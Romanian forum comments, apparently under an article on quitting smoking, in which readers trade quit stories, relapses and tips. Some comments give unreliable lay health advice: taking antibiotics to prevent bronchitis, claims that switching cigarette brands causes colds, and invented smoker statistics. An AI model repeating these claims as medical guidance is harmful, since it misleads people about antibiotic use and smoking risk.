  Viorel am citit comentariul tau si e mai bine fara tigari, tu nu crezi? sper sa ma pot lasa si eu din nou..m-am lasat 6 luni si le-am luat iar .Acum nus dc dar mi-e f greu sa le las ,ce sa fac astept un sfat..


 69. Catalin :

  Si eu am fumat 10-12 ani,am 28 de ani,de 3 luni nu mai fumez,si ma simt mult mai bine.Este prima data, de cand m-am apucat de fumat, cand stau atat de mult fara tigari,si, credeti-ma k, nu m-as mai apuca niciodata sa fumez.A fost putin mai greu la inceput,dupa ce m-am lasat,insa,acum,chiar daca tentatia inca mai persista ,ma gandesc k este o prostie mare acest viciu,k de altfel toate viciile.Iti distrugi pur si simplu sanatatea,si e pacat,plus k sunt bani cheltuiti aiurea.Si mai e ceva:eu,unul,ma simt mai liber,nu mai sunt un prizonier al tutunului,m-am eliberat.E un sentiment placut.Incercati si voi,cei care fumati,nu va mai ganditi la ele,si o sa vedeti k o sa va fie mult mai bine,din toate punctele de vedere!


 70. khristie_81 :

  greu dar posibil


 71. george :

  SALUT!M-am lasat de fumat pe 1 aprilie 2008 si am ceva experienta.am facut un calcul si in 18 ani de fumat mi s-a scurtat viata cu 14 luni.a trebuit sa am in familie un deces(socrul)care a murit de cancer si a trebuit sa vad 2 filme cu plamanii lui ca sa-mi dau seama cat de periculos este fumatul.am spus stop si am mestecat 14 zile nicoret.lasatul brusc e cel mai rapid mod de a te lasa dar are si efecte secundare.cand m-am lasat ma dureau toate cele din corp(oase,burta,capul,etc,dar dupa o perioada de 11 luni nu mai am probleme.am avut colac peste pupaza si operatie de apendicita la 1 luna si 19 zile de la lasat.stari de nervozitate,ce mai e rau,dar trebuie sa va lasati.asa de bine ma simt,insa de la 95kg am 108kg intr-un an.daca va este draga viata lasati-va de fumat ca veti castiga multe:gustul de cacat din gura,mirosul din piele,flegmele negre dimineata,urinatul des noaptea,disparitia oboselii,respiratie mai usoara,respectul celor din jur si multe zile pe care DUMNEZEU le da ca te-ai nascut a doua oara.nu beau de 6 ani si nu fumez de una an.BAFTA LA TOTI CARE VOR SA SE LASE DE FUMAT


 72. andrei balint :

  ma bucur pt.tine,felicitari,sa stii ca si eu implinesc luna asta in 20 1 an de cand m-am lasat de fumat si ma simt extraordinar de parca vorba ta m-as fi nascut a doua oara!sper sa ia cat mai multa lume exemplul nostru!


 73. bomber :

  bina am 28 ani fumez de 13 ani si azi am zis stop sper sa ma tina.am un copil mic si nu vreau sa ii fac rau.va anunt peste vreo 2-3 sapt.mentionez ca o sa fac tot posibilul sa ma las.pusy


 74. Andrei Pirau :

  salut Implinesc 31 ani in iunie si ma tot chinui cu fumatul. Am avut mai multe tentative de a ma lasa…s-a intamplat sa nu fumez chiar si o luna, dar de fiecare data se intampla “ceva” care determina recidiva. Si chiar m-am saturat: ma simt rau si fizic(dureri in gat, gura, senzatii aiurea in ceafa etc.) si psihic. Imi face bine sa vad aici oameni care au reusit!!! Sunt excelente forumurile astea….Maine incerc iar, sper sa fie definitiv!


 75. george :

  CEI CARE FUMATI INCERCATI SA CITITI NIVELUL GUDRONULUI,NICOTINEI DE PE PACHETE SI VETI CONSTATA CA LM SUPER LUNG SUPER LIGHT ESTE CEL MAI ,,BUN” DE PE PIATA.SI UN SFAT NU SCHIMBATI TIGARILE CA RACITI.E VERIFICAT SI TESTAT.DACA TUSITI NU FUMATI MENTOLATE CA NU SUNT BUNE SI LUATI ANTIBIOTICE CA SA EVITATI BRONSITELE CARE SE CRONICIZEAZA SI NUMAI AVETI CE SA LE FACETI.MAI BINE VA LASATI.CINEVA SPUNEA CA MAICA-SA FUMEAZA 2 PACHETE PE ZI SI NU ARE NIMIC.ASA E SI CU HORNUL DE LA SOBA :NU SE ASEAZA STIRIGIA INTR-O ZI CI IN TIMP SI IA FOC MAI TARZIU.ASA SI BOLILE FEREASCA DUMNEZEU PE TOTI DE ELE.LASATI-VA FRATILOR.


 76. sergiu :

  Buna.Am 29 ani si acu 3 ani m-am lasat de fumat intr-o dimineata , pur si simplu nu mai voiam sa fumez.Timp de 3 ani nu am mai pus nici o tigara in gura dar dupa cateva iesiri mai dese in locatii de fumatori si cateva beri am inceput sa mai trag cate una .Ziceam ca fumez doar asa.. la petreceri , si deja m-am trezit ca fumez mai mult de un pachet pe zi.Sunt hotarat sa ma las ca deja am 3 luni de fumat si ma simt obosit .


 77. ionutz :

  salut,am 26 de ani si fumez de 8ani,am avut cateva tentative sa ma las dar nici una nu s-a soldat cu vreo reusita,cel mai mult nu am fumat vreo 2luni…dupa care m-am apucat iar…acum vreau sa ma las iar,macar o perioada daca nu reusesc definitiv.


 78. ella :

  am incercat si eu dar dupa 2 zile m-am apucat din nou.dar sant hotarata sa renunt sper sa ma ajute Dumnezeu.sant f.convinsa ca tigarile nu ma ajuta la nimic .mama imi zice mereu bani si sanatate arse.cu Dumnezeu inainte!sper ca la urmatorul mesaj sa va spun ca m-am lasat!


 79. Tiplea Gheorghe :

  Pt. toti care citesc acest site vreau sa le dau un sfat care poate fi urmat sau nu.RENUNTATI DEFINITIV LA FUMAT.Sunt unul din cei multi care a facut acest pas.Cine are de cistigat din asta?Tu si numai tu cel ce a avut taria si intelepciunea sa faca acest pas.In functie de virsta,afectiuni in mod cert dupa o perioada f.grea se va inbunatati viata,mai mult sau mai putin dar e un real cistig din toate punctele de vedere.Daca te gindesti cu adevarat la o viata mai buna ,renuntarea la fumat te ajuta mult de tot.Singurul care decide esti tu.


 80. marius :

  Fratilor am 4 luni de cand m-am lasat.E un miracol, pe bune!E prima oara cand ma las si nu m-as mai apuca niciodata.Am economisit 700 de lei in doua luni.Un motiv bun sa le lasi, nu?Chestia ca las ca mai bag una si gata nu merge.De tot si dintr-o data.Am vazut ca unii nu ati suferit deloc.NOROCOSILOR!!!!!Am avut stari de nervozitate vecine cu nebunia, cumulate cu stresul de la servici….


 81. ioana :

  salut, eu nu sunt fumatoare si nici nu am de gand sa ma apuc vreodata.sunt convinsa ca fumatul dauneaza foarte mult.mi`e deajuns ca ma simt rau de fiecare data cand cand stau intr’un local in care se fumeaza….mi`e greata si ma ustura ochii.dar as vrea totusi un sfat:cum sa`l conving pe prietenul meu sa se lase si el de fumat?…s`a apucat, cred ,in urma cu 2-3 ani si mereu imi zice ca se poate lasa oricand pentru ca el nu fumeaza atat de mult dar are momente cand fumeaza si cate 3 pachete pe zi sau pe noapte…mai ales daca e la cantare, pentru ca este muzicant si i se mai face si rau pe deasupra.inainte cand era doar cu mine nu fuma (deoarece stia cat de mult ma deranjeaza) ci doar cand eram cu prietenii,acum numai tine cont de lucrul asta.as vrea sa`l conving sa se lase fara sa`l cert sau sa`l amenint…v`as fi recunoscatoare pt orice sfat :)….


 82. ioana :

  si felicitari pt cei care v`ati lasat>:D<


 83. Nefumatorul :

  Articolul e construit cam asa: “cu toate ca aflam de peste tot cit rau face fumatul, eu va mai spun inca o data”.
  Daca asta nu ajuta.
  Fumatorii nu fumeaza pentru motivele pentru care ar trebui sa NU fumeze. Ei se pot lasa de fumat numai daca afla motivele pentru care fumeaza.
  Se gaseste gratis pe internet cartea “In sfarsit nefumator” de Allen Carr, din care fumatorul afla acele motive.
  Dupa care se lasa usor si placut de fumat.
  Cum am facut si eu, dupa ce fumasem 27 de ani.


 84. MIKELINA :

  buna!am 26 de ani si fumez de la 18 cu pauze de 1 an citeva luni etc.acum am fost operata de fiere si nu am mai fumat de atunci.dati-mi curaj ca e ft greu mai ales ca sotul meu fumeaza.am si doi copilasi,baietei unul are 2 ani si celalalt 10 luni.macar pt ei sa o fac.dar aici in ATENA,unde locuiesc eu e greu sa te lasi…


 85. MIKELINA :

  a!am o saptamina de cind m-am lasat


 86. elena :

  Eu in fiecare saptamana decid sa ma las dar nu reusesc.La mine in familie doar socrul meu fumeaza.Nu stiu cum sa fac sa ma las…Dati-mi un sfat.Multumesc.P.S. stiu ca e doar o chestiune psicologica .


 87. DELEANU RODICA :

  Buna , tuturor! Eu nu fumez, n-am fumat niciodata! Fac alergie la fumul de tigara, urmare a unei bronsite asmatiforme din copilarie!Sotul meu fumeaza…2 pachete sau mai mult. De obicei afara, dar isi mai aprinde si in bucatarie dupa care iese afara cu tigara aprinsa.Simt acel miros ore intregi! Nu se gandeste niciodata cat rau imi face! Si copiilor bineinteles.! Si mai si bea! N-are pic de vointa sa se lase! i-am facut un calcul: 2 pachete x 7 lei/pachet x 30 de zile ?????????????????????= 420 PE LUNA . FFFFFFFFFMULT.
  Si intr-o zi au inceput sa-i cada dintii: paradontita!!!! Si i-a zis dentista sa se lase de fumat , pentru ca gudronul ii face foarte rau, iar tratamentul si banii o sa-i dam degeaba! SI S-AR PUTEA SA DEA SI INTR-UN CANCER BUCO-MAXILAR. si credeti ca s-a lasat? Parca mai mult fumeaza. Ca nu are vointa, e prea putin spus!


 88. Nefumatorul :

  Dintre toate drogurile, nicoatina produce cea mai rapida dependenta. Sint suficiente cateva fumuri pentru unii, cateva tigari pentru altii. Dar dependenta fizica e mizilic fata de raul pe care il produce spalarea creierului. Toata lumea a auzit ca fumatul calmeaza, relaxeaza, elibereaza stressul, alunga plictiseala… Nici vorba de asa ceva! Dar fumatorul VREA sa creada asta, ca sa isi justifice dependenta. Complicata treaba!… Eu stiu, pentru ca am scapat de fumat dupa 27 de ani. Mi-a fost usor, chiar placut, dar asta pentru ca am inteles fenomenul. Va recomand cartea lui Allen Carr, “In sfarsit nefumator”. O gasiti gratis pe internet.


 89. Sorinacio :

  am 19 ani si m-am apucat de fumat pe 11 august 2007 (de 2 ani).Insa ieri la ora 6:00 dimineata am zis asa:stop tigari pana nu e prea tarziu.deocamdata imi este pofta dar ma abtin.fumam si foarte mult 2 3 pachete pe zi.de saptamana viitoare ma apuc de alergat.cand fac sport nu simt nevoia sa fumez.oricum tare site`ul.la mai multi nefumatori!


 90. zam77 :

  Eu am reusit sa ma las( a cincea oara,am stat cate 6 ,8 luni 1 an fara sa fumez deloc) de fumat.As vrea insa sa va spun cum m-am lasat prima data(sa nu radeti varog!):in 2001 lucram in Constanta la un hotel,la reparatii ,nu eram decat eu si un coleg in tot hotelul,intr-o zi am gasit o revista intr-o camera si in revista ce sa vezi ,metoda sa te lasi de fumat:cand iti vine sa fumezi in loc de tigara bei un pahar de apa.Asa am facut si noi si intr-o saptamana in care am baut apa cat in 6 luni am reusit sa nelasam,ajutati si de niste dropsuri de menta si poate si de faptul ca eram singuri acolo si nu vedeam pe nimeni fumand pe langa noi!Nu stiu cum o sa vi se para metoda asta dar la mine credeti-ma ca a mers ,nu am mai fumat aproapeun an!


 91. Elena :

  E foarte interesanta aceasta problema pe care o au o multime de oameni.Eu pur si simplu nu ii inteleg, nu inteleg cu ce ii ajuta fumatul (de parca i-ar ajuta cu ceva).In fine… aveti dreptate, vointa conteaza mult.
  In ultimul timp nu stiu ce am patit,ma simt atat de tentata sa fumez… macar o tigara.Nu am mai fumat pana acum.Cred ca ma simt tentata sa vad cum e.Nu cred ca poti deveni dependent dupa o tigara…totusi, am doar 16 anisori:| … Si anturajul e de vina…majoritatea colegilor mei fumeaza si nu cred ca am vointa necesara pentru a ma impotrivi :(


 92. deea [Dd] :

  Buna!:) am 15 ani si fumez de aproximativ 2 luni jumate`…bineinteles din cauza anturajului..am colege in clasa care fumeaza de la 10 ani :| si cu frazele”hai incearca si tu ca nu stiu ce nu stiu cum”si mam apucat si eu dar cam pe la sfarsitul anului scolar… sunt unele zile in care pur si simplu numi trebe sau fumez numa 2-3 tigari pe zii .. de exemplu azi am fumat doar 3 tigari..asa e daca vrei te lasi dar trebe ambitie`si eu deocamdata nu pot si nici nu vreau din cauza mamei mele care nu sa lasat de fumat la cat mam rugat de ea si asta e un motiv pentru care mam apucat de fumat..in fine sper sa ma las!:)


 93. Viorel :

  Cand va veti hotari sa reuntati la “placerea” de a fuma,va asteapta o echipa de sprijin aici :
  http://www.stopfumatul.ro/forum/index.php


 94. florentina :

  am o saptamana de cand nu mai fumez. Totul s-a intamplat joia trecuta, cand am venit de la munca si mi s-a facut rau, aproape ca am leinat. a trebuit sa chem salvarea, am speriat-o pe mama de moarte. va intrebati probabil ce s-a intamplat? Fumam de 9 ani, la inceput pana-ntr-un pachet pe zi. apoi am inceput cu un pachet, iar in ultimii 3-4 ani, cu cate 2 pachete pe zi. imi doream in sufletul meu sa renunt, dar cred ca niciodata nu m-am gandit serios la consecintele fumatului. in ultimele 2 saptamani am avut niste proiecte la munca foarte urgente, asa ca fumam pe rupte, stresul era foarte mare, sefii cereau cat mai multe, plecam pe la 6-7 seara de la munca, abia mancam pana ajungeam acasa(cativa covrigi si restul tigari). in ziua in care aproapeca am lesinat, mancasem doar un mar. si in plus la toate, de vreo doua saptamani aveam hemoragie - ciclul continuase, probabil tot datorita stresului. am ajuns la spital foarte slabita, am urmat tratament cu antibiotice, mancare la greu(ca sa-mi revin ca nu mai am vitamine in mine). si dupa o saptamana, inca ma simt slabita, am concediu medical pana saptamana viitoare, proiectul de la munca s-a finalizat cu bine cat eram eu in spital dar altii au luat laurii…frumos, nu? sigur!!!! dar cel mai mult ma bucur ca am reusit sa ma las de fumat. am cateodata senzatia ca as vrea sa mai iau o tigara in mana, dar cand ma gandesc prin ce am trecut si mai trec…..zic mai bine nu! aleg sa traiesc!! atentie mare pentru toti fumatorii!!!!


 95. georgi :

  fumez de 1 an si ma pot lasa usor.vreau doar sa va intreb daca ma las de fumat am auzit ca se pot intampla multe lucruri cum ar fi sa cada parul sa se sbarceasca pielea,ameteli…..este adevarat?


 96. Stefan :

  Sall! Am 14 ani si ieri sera am invatzat sa fumez am fumat 2 tigari dar azi mia parut rau si nu mai vreau sa puna tigara in gura chiar nu simti nimic cand fumezi. Si inca cevasucces celor care vreti sa va lasati mai ales copiilor ca mine nu mai fumati va distrugeti viitoru.


 97. Ciprian :

  Am cam 30 de ore de cand nu am fumat, am 28 de ani si fumez cam de 12 ani, sunt foarte nervos si nu-mi gasesc linistea, dar sunt hotarat sa nu ma mai apuc… sper sa reusesc.M-am decis sa ma las din simplu motiv: distruge sanatatea. Bafta tuturor


 98. Tiplea Gheorghe :

  Am uitat sa ma laud pe data de6 Octombrie 2009 cind am implinit un an de cind nu mai fumez(dupa 36 de ani de fumat).Am reusit si acest lucru dovedeste ca se poate daca vrei cu adevarat si ai si probleme cu sanatatea.Fara sfaturi de la altii fara nimic altceva decit ambitie asa am reusit.Doresc sa citesc si alte laude de acest fel.Succes curajosilor.


 99. andreea :

  buna..ma numesc Andreea…si am si eu o intrebare…am o prietena care fumeaza X( de aproximativ un an,daca isi face o radiografie..se observa ca fumeaza?:) [multzumesc]


 100. Emanuel :

  eu m-am lasat de la 30 de tigari pe zi la zero fara nici un efort.. a fost chiar placut :D am citit o carte: Allen Carr - in sfarsit nefumator

  cunosc mai multe persoane care sau lasat dupa ce au citit cartea..

  nu poti prin metoda VOINTEI?
  incearca metoda USOARA :D
  e o diferenta majora intre aceste metode..

  ceea ce e frumos este ca e recomandat sa fumezi in timp ce citesti cartea.. si cand te lasi, nu mai ai nici o pofta pentru tigari.

  nu ma credeti pe cuvant.. incercati :D nimic de pierdut


 101. cristina :

  am 3saptamani de cand nu mai fumez dar tentatia de ami aprinde o tigara o am ,ma simt foarte bine dar ma dor genunchi foarte mult de cand nu mai fumez,cred ca de la alegat..alerg tot a doua seara de frica sa nu ma ingras..ce pot sa fac sa nu ma doara genunchi de tigari in orice caz nu vreau sa ma apuc iara,curaj tuturor se poate si nu este chiar atat de greu totul este sa spui “NU” la orice ispita..BAFTA TUTUROR


 102. rodica daniela :

  In urma cu o saptamana si ceva am scris pe site-ul “sfatul medicului.ro” mai exact intrebam daca imi pot procura din farmacie ceva care sa ma ajute sa ma las de fumat.Fumez(am fumat)timp de 27 de ani. Printre comentariile citite am gasit unul care zicea “cititi,ALLEN CARR-in sfarsit nefumator” apoi inca unul ,inca unul vreo 4 sau 5 comentarii de acest gen.Ma facut curioasa si am cautat pe google.Vreau sa spun ca am avut destule incercari (inainte)de-a ma lasa de fumat ,dar esuate….
  Dupa ce am citit aceasta carte(are 188 de pagini)m-am lasat pe loc.Este ceva incredibil,dar functioneaza.Sfatuiesc toti fumatorii sa o citeasca pentru a reusi sa abandoneze acest viciu.BAFTA


 103. ex smoker :

  hehe… acum 3 zile ma uitam la Dr G pe Discovery. era o emisiune despre “cum sa nu mori” un fel de top. pe locul 1 era fumatul. cele mai multe decese in america din cauza fumatului. acela a fost momentul decisiv. dupa o scurta filozofie cu privire la acest obicei, am hotarat sa incerc sa ma las. de 3 zile nu am aprins nici o tigara,si culmea, pe cat eram de stresat ca nu voi reusi, nu simt nevoia de a fuma! ciudat! a ramas doar obiceiul. dar se stapaneste usor. imi ocup timpul si momentan ma feresc de fumatori. sper ca voi reusi sa renunt. viitorul suna bine! :P


 104. maia-home :

  AM 51DE ANI SI SUNT FUMATOARE DE PESTE35 DE ANI.DIN DATA DE30 NOEMBRIE NU AM MAI FUMAT.AM TRECUT SI INCA TREC PRIN NISTE STARI INGROZITOARE.REZIST!AM DE ANI DE ZILE O VOCE RAGUSITA ,DUPA CEAM RENUNTAT LA FUMAT RAGUSALA S-A ACCENTUAT.LA ORL MI S-A SPUS CEVA DE REFUX GASTROESOFAGIAN,MA MAI POATE AJUTA CINEVA CU UN SFAT DE SPECIALITATE!?


 105. maia-home :

  FELICITARI D-LUI TIPLEA GHEORGHE!AVETI UN PRIM AN FARA FUMAT ESTE CEVA!


 106. un fumator...? :

  Nu doresc sa dezamagesc pe nimeni, insa tutunul este un drog care, o data inhalat in mod voit (fumat)va creea dependenta pentru toata viata. De ce spun acest lucru ?
  De la varsta de 16 ani am inceput sa fumez si am continuat sa depind de acest viciu timp de 12 ani cand ajunsesem la 1 pachet/zi si numai tigari “tari”(ASSOS pentru cunoscatori). La varsta de 28 ani mi-a venit mintea la cap si am renuntat brusc la acest obicei pagubos. CE REALIZARE !!! Am rezistat 8 ani timp in care nici nu mai suportam un fumator in preajma mea! Dupa 8 ani am fumat cate o tigara cam la 2 zile ferm convins ca nu voi mai putea relua aceasta “activitate”. CE DEZAMAGIRE !!! Au trecut 4 ani de atunci. azi fumez 3 pachete la 2 zile.


 107. elenaflorica99 :

  Tigara electronica este o solutie eleganta si eficienta de a te lasa de fumat.


 108. roger :

  nu pot sa ma las..ce dracu sa fac,,am incerkt si cu plastori,tigari anti_fumat.aiurea.


 109. nico :

  am 40 de ani si de 9 luni am renuntat la tigari si ma simt extraordinar.deci se poate. succes


 110. nico :

  nu trebuie sa incerci nimic .iti trebuie doar omare vointa si convingerea ca vrei sa renunti intradevar la ele


 111. Deea :

  Fumez de aproximativ 3 4 ani si imi place,mai ales dimineata la cafea,la o discoteca sau imediat dupa ce mananc.si nu fumez mult, 5 6 tigari pe zi,ba kiar sunt zile knd nu fumez deloc.Am sa ma las,probabil,de ele in momentul in kre ma voi simti rau.Era si o melodie in kre spunea asa:fara vicii am fi doar niste roboti si sunt de akord ku asta:))Mai devreme sau mai tarziu tot ne dukem…makar sa stim k am incercat sa facem de toate in viata(ku niste exceptii,totusi:))


 112. maia-home :

  Persist in hotarirea ce am luato,aceia de a nu mai fuma!Pot spune ca ma simt un pic mai bine!Ma omora insuficienta respiratorie. De cind nu mai fumez respir si eu ca lumea!


 113. calin :

  si eu incerc sa ma las de fumat si pana akma am 3 zile de cand nu mai fumez de loc, fac tratamentu cu nicorete plasture si pana akma ii bine
  dar mai am ceva dureri de piept da oare de ce?
  succces la toti


 114. valy :

  vreau sa zic ca e foarte greu de anandonat fumatul. am citit toate comentariile de aici.cam toti aveti dreptate si fumatu se manifesta la fel la toata lumea, ma refer la dependenta.si eu am crezut ca se poate lasa opricind si ca e f usor dar mi am dat seama ca nu e deloc asa, si ca e f greu mai ales cind esti inconjurat de fumatori.trebuie incercat sa evitam sa stam intre fumatori pina reusim sa ne lasam, dar ma ingrijoreaza ca unii de aici au zis ca s au repaucat de fumat dupa ce s au lasat initial si culmea dupa multi ani , chiar 8 sau 9 ani am vazut. e f ciudat.inseamna ca dependenta asta psihica mai mult e foarte mare.deci e periculos pt cine se apuca de fumat si nu stie cel asteapta.mai astept si eu sfaturi ca sa reusesc.


 115. dana :

  am 28 de ani si fumez de 12 ani…in camera de alaturi doarme frumos printesa mea in varsta de 10 luni(in timpul sarcinii si alaptarii n-am fumat;de cand am nascut se fumeaza pe balcon)…pt ruslana vreau sa renunt definitiv si eu si sotul meu la acest viciu ce ne distruge lent mintile,sufletul si intreg organismul…si ce e mai important…imi doresc din suflet sa-mi vad copilul(poate copiii) realizat si fericit,sa-mi cunosc nepotii mai tarziu,sa le fiu alaturi sanatoasa pt a-i putea ajuta…E F GRAV CA NIMENI NU CONSTIENTIZEAZA CAT E DE PERICULOS FUMATUL DECAT IN MOMENTUL IN CARE SIMTI CA A PUS CU ADEVARAT STAPANIRE PE TINE INSUTI.


 116. dana :

  UN SFAT PT CEI CARE SUNT TENTATI SA SE APUCE DE FUMAT: uitati-va in jur si veti vedea ca din 100 de fumatori nici macar unul singur nu a putut spune “STOP”(spunea cineva mai sus) fara sa fi trecut prin cel putin 5 tentative(cruciale) de a renunta iar partea grava e ca din cei 100 de fumatori,60 fumeaza de peste 20 de ani,20 din ei peste 10 ani si 20 intre 5-10 ani…ideea e ca din 100 DE FUMATORI…99 VOR FI AFECTATI GRAV mai devreme sau mai tarziu


 117. tavi :

  Am fumat 22 de ani, si am incercat tot ce se poate sa ma las de ele, 2 pachete pe zi, uneori si mai mult. Am incercat cu tot felul de tincturi, gume si plasturi, etc. Toata chestia e de vointa, am cumparat in disperare tigari medicinale sunt scumpe ca naiba, si am aruncat toate tigarile normale. Am inceput cu un pachet de “mahoarca” pe zi, ca nu pot sa le zic altfel, multa vointa sa tii “tratamentu”, te ustura gatu si ochii, va recomand mentolate ca sunt mai putin rele. Nu au nicotina si efectu e devastator, esti nauc de cap din cauza lipsei de nicotina. Dca rezisti la tratamenul acesta ai scapat, eu am 2 ani, dar nu am mai pus tigare in gura. In schimb “nostalgia” dupa o tigara buna nu m-a parasit. Foarte greu m-am lasat, inca o data multa vointa sa fumati numai tigari fara nicotina.
  In momentul in care organismul renunta la doza zilnica de nicotina ati scapat de fumat. Multa bafta si sper sa renuntati la fumat. Sper sa nu interpreteze cineva drept reclama sau antireclama la cine stie ce produs.


 118. maia-home :

  Peste citeva zile,se inplinesc 4 luni de cind nu mai fumez,SANATATEA mi s-a amliorat.Da,ma simt putin mai bine si totusi nu ma consider complet vindecata de tigara atita timp cit mai visez din cind in cind la ea.Mizerabila situatie,sper sa rezist!Vorbesc de dependenta psihica,de starea de sadisfactie care ti-o da tigara in anumite momente si mai ales de obisnuinta pe care am capatat-o in atita amar de vreme.


 119. romeo :

  M-am lasat si eu si dupa o luna am dureri de cap si niste ameteli , sa fie oare de la asta ? Vi sa intamplat si voua asa?


 120. Marioooo2 :

  Imi e frica sa nu fac cancer dar nu pot sa ma abtin de la fumat…fumez vreo 8 tigari pe zii constient insa ca nu e bine. Ce sa fac, tottusi nici sa ma las nu as vrea!


 121. nuty :

  eu m am lasat de fumat in spital am avut un flegmon cu stafilococ si atreb sa fac antib in perfuzie cred k m am curatat de nico acum din aia 10 lei kre cump tig un pachet pe zi imi iau ceva la kre ma zgarceam sa mi i au mentionez k la tig nu m am zgarcit vreodata am fumat peste 20 ani rusinos sunt 4 tentative de a renunta sper asta sa fie definitiva


 122. sevi :

  am 15 ani, de la 4 tigari deja ma ia de cap, ma las cand vreu eu, pe la vre-o 24 de ani!!!!!


 123. felice 33 :

  Bafta tuturor! Si eu am 8 saptamani fara tutun!Am luat 5 kg in plus,dar nici ca-mi pasa!Merita orice efort ca sa iti faci cel mai mare bine posibil!O viata fara vicii!


 124. simona :

  salut!si eu ca si voi am fost o fumatoare de ani buni dar de cateva zile am zis stop,fumam aproape 2 pachete la zi…..ma simt bine,nu mananc mult vad ca sunt ok….


 125. floryn :

  fumez zilnic 3 ,4 tigari pentru ca ma ametesc……dauneaaza asa mult cateva tigari la zi??????


 126. Strumphu :

  Interesant articolul, dar pe mine pur si simplu nu ma conving astfel de articole, fumez de “doar” 5 ani, probabil de asta nu vreau sa renunt la tutun. Nu as renunta nici daca s-ar da vaccin pe gratis…fumez minim 2 tigari dar am zile cand fumez si 2 pachete….


 127. maia_home :

  Imi place sa revin din cind in cind,si sa ma bucur ca pot spune NU AM MAI FUMAT DE 7 LUNI,nu-i misto?


 128. justme :

  Interesant articol, dar cam putine spuse.


 129. dan :

  salut ,am 36 de ani si am fumat 20 .cum m-am lasat? o sa va spun ,a trebuit sa vad zidupa zi cum taica-meu moare incet si in chinuri din cauza unui cancer de plamini,va spun e oribil ,nu se merita pt nimic in lume sa fumezi toate vorbele alea ”ca mie nu-mi face rau ,ca eu sint cel mai tare ,camie nu mise intimpla sint numai prostii va spun eu se intimpla ………..si cind se intimpla nute mai faci bn credeti-ma pe mine ca am umblat peste tot cu taica-meu si degeaba ……….


 130. silviu :

  mai dar mai lastima cu cartile lui allen si ale lu tata. voi cititi si va lasati si apoi iara le apucati sa pufaiti. asta nu e ajutor din cartea lui allen. ia o scris si ala akolo sa isi vinda cartea. la ce folos sa va ajute pe voi cand voi nu va puteti ajuta pe voi in privinta tigarilor. daca tot vrei intradevar sa le lasi lasale dracu. si eu am fumat 10 ani si am 25 de ani acum si uite k am renuntat la ele. mai e problema voastra dak vreti sa le lasati sau nu. stiu k in romania se castiga greu si banii sunt putini. dar uite eu sunt peste hotare si imi permiteam sa imi cumpar un cartus pe sapt dar in tara va inteleg. nu aveti bani si gata:))
  asa k mai bine lasatile si strangeti economii k vin vremuri grele. si eu eram fumator da rle-am lasat. pai stai un pic ce stres ai u in viata asta? sau cine te enerveaza? ma rog sunt sumlte intrebari la care tigarile crezi k iti dau rasp? nu e asa tigara nu calmeaza dimpotriva ucide, ucide pana va lasa doborati si la final uite k a reusit tigara k asa e omul pana nu da cu capul de pereti nu se opreste:)
  va las sper si eu sa reusiti oemeni buni sa le lasati:)
  eu asa mi-am lasat de tigari. a dosua zi nu am mai fumat si mam gandit eu oare am pipat eu vreodata? si uite asa am putut sa le las. si uite k tine la mine:)


 131. Dani :

  da


 132. Ady :

  eu mananc acadele k sa nu mai simt nevoia de a fuma


 133. Came :

  Toate articolele despre fumat si cat rau poate produce acest gest reprezinta un adevarat stres pentru fumatori,care de multe ori,nici nu accepta sa citeasca asa ceva,refuzand cu orice pret constientizarea acestui lucru.E normal…ne ascundem dupa deget cat putem…dar va veni si ziua in care cu siguranta vom avea de suferit…noi si implicit organismul nostru.Nu azi,nu maine…cine stie poate poimaine,poate peste 10 ani…cand viata ti se va parea si mai frumoasa,poate atunci te vei lovi cu capul de zidul mortuar pe care l-ai construit atatia ani la rand.Te vei intreba atunci:”De ce mi se intampla tocmai mie?” Raspunsul va fi unul clar…ti-ai facut-o cu mana ta,ai ales sa-ti “murdaresti” plamanii…sa-ti ingustezi vasele de sange,sa-ti strici dantura,atat de importanta,si multe altele…finalizandu-se cu un diagnostic atat de comun fumatorilor : CANCERUL BRONHO-PULMONAR.Tu iti alegi cum vrei sa traiesti,spune azi ” STOP FUMATULUI ” si nu uita ca POTI orice,trebuie doar sa VREI.Eu…fumez de aproximativ 5 ani,ocazional spun eu…adevarul doare insa,dar e unul singur:fumatul ocazial sa tranformat in activitate zilnica,pentru ca din nefericire 80% dintre prietenii mei fumeaza si ma influenteaza fara sa vreau;a devenit un mod de socializare…pana la un moment dat…si acest moment e azi :) ziua in care m-am decis ca vreau sa fiu altfel,sa fiu mai sanatoasa,sa ma simt mai bine,mai frumoasa(unei femei ii sta urat cu o tigara,oricat de artistic poate parea intr-o poza).Azi nu am fumat nicio tigara…si vreau sa continui in acest ritm!Succes si voua in aceasta lupta apriga impotriva fumatului!


 134. maia_home :

  Revin,din 29 Nov 2009 nu mai fumez,este foarte bine!:)succes tuturor !


 135. ciprian :

  azi fac 1 an si 4 luni de cand nu mai fumez, ma simt excelent . Se poate si fara ! Bafta tuturor


 136. ceTTo :

  olaaa.!! gata am renuntat shi yo la tigari.. doar k surprinzator a fost ca doar in primele 3 zile mi`a fost mai greu.. am deja o saptamana si, doar seara ma apuca o pofta de tigare, dar cu un pic de vointa o alung.. :) si sunt nu mai intre prieteni fumatori, shi invidiosi care ar face ori ce sa ma apuc iar!! dar nu!! nu este atat de greu.. apropo.. mancam max de 2 mese pe zii aqm ajung la 4 mese… pt mine este bine am 1.86 inaltime shi 60kg. tre sa pun ceva pe mine.. va multumesc tuturor..


 137. ramo :

  Buna,
  in 10 ianuarie m-am lasat de fumat,n-am avut probleme foarte mari, dar de 2-3 zile parca turbez dupa o tigara.Fac eforturi foarte mari sa ma abtin. Nu stiu ce se intampla.Ajutor!!!!
  Felicitari tuturor, in special Maiei_home.


 138. vali :

  sunt fumator de 4 ani am incercat sa ma las dar nu am avut vointa necesara,dar acum ma las sigur nu mai fumez d putin timp si asta datorita starii de sanatate…inima ficatul…etc..Asa k lasati_va k e o prostie sa fumamati niciodata nu e tarziu.decat sa suferiti k mine acum ,eu care eram sanatos tun,mai bine renuntati chiar de azi!mult noroc tuturor si sanatate!


 139. Alex20 :

